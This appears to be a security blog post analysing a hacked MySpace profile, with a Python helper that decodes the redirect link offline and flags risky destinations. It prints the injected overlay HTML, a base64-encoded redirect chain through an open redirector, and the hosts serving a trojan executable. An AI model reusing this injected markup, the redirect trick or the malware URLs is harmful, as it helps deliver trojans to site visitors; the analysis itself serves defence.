MySpace hack

After hearing all kinds of stories about bad security at MySpace, I finally found a hacked profile. The profile, cyn7777, has now been cleaned up, so some parts of what follows will not work anymore.

The key to the attack was the following lines, which were inserted into the profile's main page:

<a href="http://www.msplinks.com/MDFodHRwOi8vY29tLmNvbS9yZWRpcj9lZEl
kPTMmZGVzdFVybD1mdHA6Ly9taWNyb3NvZnBjZW50ZXI3MS5jbi9LQjg5MDgzMS5leG
U="><img
src="http://img341.imageshared.cn/.." style="position:absolute;
left:0px; top: 0px;" border="0"></a>

The code loaded an image similar to the following one and superimposed it on the page's contents. The actual image was 990x990 with a transparent background, so, at first sight, the figure could be taken for a system window: a classic picture-in-picture attack.

Screenshot of the fake removal tool window

Clicking anywhere on most of the page caused the browser to visit the base64-looking URL on msplinks.com. It turns out that back in April 2007 MySpace started to convert certain links to redirects through the msplinks.com site (check out the source of its index page :-)). The goal? "To easily turn off links to spam, phishing, or virus sites".

It looks like that didn't work too well... In fact, the link on msplinks.com (still) redirects to

(Incidentally, nice open redirector, cnet.com!)
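The redirect chain described above can be unwrapped offline, without contacting any of the hosts involved. The following is an added example, not code from the original post; it assumes the msplinks.com token is plain base64 with a short prefix before the URL, and the function names are hypothetical.

```python
import base64
from urllib.parse import urlsplit, parse_qsl

# Token copied from the msplinks.com href shown above (line breaks removed).
TOKEN = ("MDFodHRwOi8vY29tLmNvbS9yZWRpcj9lZEl"
         "kPTMmZGVzdFVybD1mdHA6Ly9taWNyb3NvZnBjZW50ZXI3MS5jbi9LQjg5MDgzMS5leG"
         "U=")
RISKY_EXT = (".exe", ".scr", ".pif", ".bat")


def decode_token(token):
    """Base64-decode the token and return the text from the first URL scheme on."""
    raw = base64.b64decode(token + "=" * (-len(token) % 4)).decode("utf-8", "replace")
    # Assumption: anything before the first scheme is a short prefix, not URL data.
    starts = [i for i in (raw.find(s) for s in ("http://", "https://", "ftp://")) if i >= 0]
    if not starts:
        raise ValueError("no URL found in decoded token")
    return raw[min(starts):]


def unwrap(url, max_hops=5):
    """Follow URL-valued query parameters offline; return every hop in order."""
    chain = [url]
    for _ in range(max_hops):
        nested = [v for _, v in parse_qsl(urlsplit(chain[-1]).query)
                  if urlsplit(v).scheme and urlsplit(v).netloc]
        if not nested:
            break
        chain.append(nested[0])
    return chain


def findings(chain):
    """Return the reasons the final hop deserves a block or manual review."""
    final = urlsplit(chain[-1])
    out = []
    if len({urlsplit(u).hostname for u in chain}) > 1:
        out.append("redirect leaves the first host")
    if final.scheme not in ("http", "https"):
        out.append("non-web scheme: " + final.scheme)
    if final.path.lower().endswith(RISKY_EXT):
        out.append("executable download")
    return out


if __name__ == "__main__":
    hops = unwrap(decode_token(TOKEN))
    print(" -> ".join(hops))
    print("; ".join(findings(hops)))
```

A link filter that applied these three checks to the decoded destination before storing the redirect would have had grounds to reject this link.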

The ftp site is still active and serves a bunch of exe files (all identical, except for their names). It seems the files have been changed in the last few days, probably to evade detection by anti-virus tools. In any case, VirusTotal recognizes the old and the new version as some form of trojan/downloader. According to Anubis, among other things, the binaries launch Internet Explorer and visit http://mycashloads.com/newuser.php?saff=373.0, which, however, redirects to yahoo.com.
